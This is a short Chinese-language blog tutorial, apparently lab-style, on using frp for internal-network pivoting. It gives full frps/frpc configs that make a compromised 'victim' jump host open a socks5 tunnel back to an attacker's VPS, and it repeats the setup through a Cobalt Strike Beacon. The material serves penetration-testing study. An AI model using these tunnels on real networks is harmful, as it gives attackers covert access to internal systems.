banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

使用frp進行內網代理

FRP 是一個專注於內網穿透的高性能的反向代理應用,支持 TCP、UDP、HTTP、HTTPS 等多種協議,且支持 P2P 通信。可以將內網服務以安全、便捷的方式通過具有公網 IP 節點的中轉暴露到公網。

frp 專案地址:https://github.com/fatedier/frp/blob/dev/README_zh.md

假如當前的網絡拓撲如下,172.16.1.2 無法直接訪問 10.1.1.2,需要通過 frp 代理訪問。

frp vps 代理#

172.16.1.2 - <172.16.1.4,10.1.1.3 > 10.1.1.2

攻擊者(172.16.1.2):

配置 frps.in 文件

image

配置文件如下:

frps.ini

[common]
bind_port = 7000
bind_addr = 0.0.0.0

受害者(跳板機:172.16.1.4)如下配置:

image

配置 frpc.ini,內容如下:

frpc.ini

[common]
server_addr = vpsip
server_port = 7000

[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

設置完成後,先攻擊者伺服器開啟監聽

./frps -c frps.ini

image

受害者端執行

frpc.exe -c frpc.ini

瀏覽器設置代理訪問

image

image

proxychains 配置代理遠程登錄

image

CS 配置 frp#

假如拓撲如下,和之前的操作其實一致。

172.16.1.3 - <172.16.1.4,10.1.1.4 > 10.1.1.3

用 CS 的 Beacon 運行 frpc 時,配置文件和程式都用絕對路徑。利用文件上傳 frpc.exe 和 frpc.ini 文件來進行代理。

image

配置文件如下

frps.ini

[common]
bind_port = 7000

frpc.ini

[common]
server_addr = 172.16.1.3
server_port = 7000

[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

代理成功。

image

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。